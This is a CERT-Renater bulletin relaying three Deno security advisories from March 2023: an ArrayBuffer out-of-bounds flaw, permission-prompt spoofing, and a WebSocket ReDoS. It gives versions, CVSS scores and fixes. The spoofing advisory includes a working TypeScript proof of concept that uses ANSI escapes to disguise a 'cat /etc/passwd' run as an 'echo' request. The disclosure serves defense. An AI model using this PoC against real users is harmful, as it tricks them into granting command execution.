=================================================================== CERT-Renater Note d'Information No. 2023/VULN116 _____________________________________________________________________ DATE : 28/03/2023 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running Deno versions prior to 1.32.1, 1.31.0, deno_runtime (Rust) versions prior to 0.103.0, 1.31.2, serde_v8 (Rust) versions prior to 0.88.0. ====================================================================https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf https://github.com/denoland/deno/security/advisories/GHSA-jc97-h3h9-7xh6 _____________________________________________________________________ Improper handling of resizable ArrayBuffer in async built-in functions Critical lucacasonato published GHSA-c25x-cm9x-qqgx Package Deno deno_runtime (Rust) serde_v8 (Rust) Affected versions Deno 1.32.0 deno_runtime (Rust) 0.102.0 serde_v8 (Rust) 0.87.0 Patched versions Deno >= 1.32.1 deno_runtime (Rust) >= 0.103.0 serde_v8 (Rust) >= 0.88.0 Description Impact Resizable ArrayBuffers passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write. It is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0. Deno Deploy users are not affected. Patches The problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. Deno 1.32.2 will re-enable resizable ArrayBuffers with a proper fix. Workarounds Upgrade to Deno 1.32.1, or run with --v8-flags=--no-harmony-rab-gsab to disable resizable ArrayBuffers. Severity Critical 9.9/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2023-28445 Weaknesses CWE-125 CWE-787 Credits @lucacasonato lucacasonato _____________________________________________________________________ Interactive `run` permission prompt spoofing via improper ANSI neutralization High bartlomieju published GHSA-vq67-rp93-65qf Package deno deno_runtime (Rust) Affected versions deno >= 1.8.0 deno_runtime (Rust) >= 1.8.0 Patched versions deno 1.31.2 deno_runtime (Rust) 1.31.2 Description Summary Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a op_spawn_child or op_kill prompt and replace it with any desired text. Details The main entry point comes down to the ability to override what the API control says (40_process.js). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in op_kill. PoC This PoC works on 1.31.1, but modified versions of it work on older versions. Make a file, e.g. index.ts, that uses this vulnerability to spoof the op_spawn_child permission prompt const boldANSI = "\u001b[1m" // bold const unboldANSI = "\u001b[22m" // unbold const prompt = `┌ ⚠️ ${boldANSI}Deno requests run access to "echo"${unboldANSI} ├ Requested by \`Deno.Command().output()` const moveANSIUp = "\u001b[1A" // moves to the start of the line const clearANSI = "\u001b[2K" // clears the line const moveANSIStart = "\u001b[1000D" // moves to the start of the line Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({ cmd: "cat", args: ["/etc/passwd"], clearEnv: false, env: [], stdin: "null", stdout: "inherit", stderr: "piped" }, moveANSIUp + clearANSI + moveANSIStart + prompt) Run the file with deno run index.ts. Impact Any Deno program is able to spoof the interactive permission prompt for the op_spawn_child or the op_kill action (which indirectly gives access to all run commands) by overriding the Requested by {message} API with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed: // Expected Prompt ┌ ⚠️ Deno requests run access to "cat" ├ Requested by `Deno.Command().output()` API ├ Run again with --allow-run to bypass this prompt. └ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) > // Actual Prompt ┌ ⚠️ Deno requests run access to "echo" ├ Requested by `Deno.Command().output()` API ├ Run again with --allow-run to bypass this prompt. └ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) > This works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run. This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). Before v1.31.0, this requires the --unstable flag. Severity High 8.8/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required None User interaction Required Scope Unchanged Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE ID CVE-2023-28446 Weaknesses CWE-150 Credits @LeoDog896 LeoDog896 _____________________________________________________________________ Regular Expression Denial of Service in Deno.upgradeWebSocket API Moderate bartlomieju published GHSA-jc97-h3h9-7xh6 Package Deno Affected versions 1.12.0 Patched versions 1.31.0 Description Impact What kind of vulnerability is it? Who is impacted? A specially crafted "Connection"/"Upgrade" header could have been used to significantly slow down web socket servers which used "Deno.upgradeWebSocket()" API. Patches Has the problem been patched? What versions should users upgrade to? It is recommended that users upgrade to Deno 1.31.0. Severity Moderate 5.3/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required None User interaction None Scope Unchanged Confidentiality None Integrity None Availability Low CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE ID CVE-2023-26103 Weaknesses CWE-1333 Credits @dellalibera dellalibera ========================================================+ CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =======================================================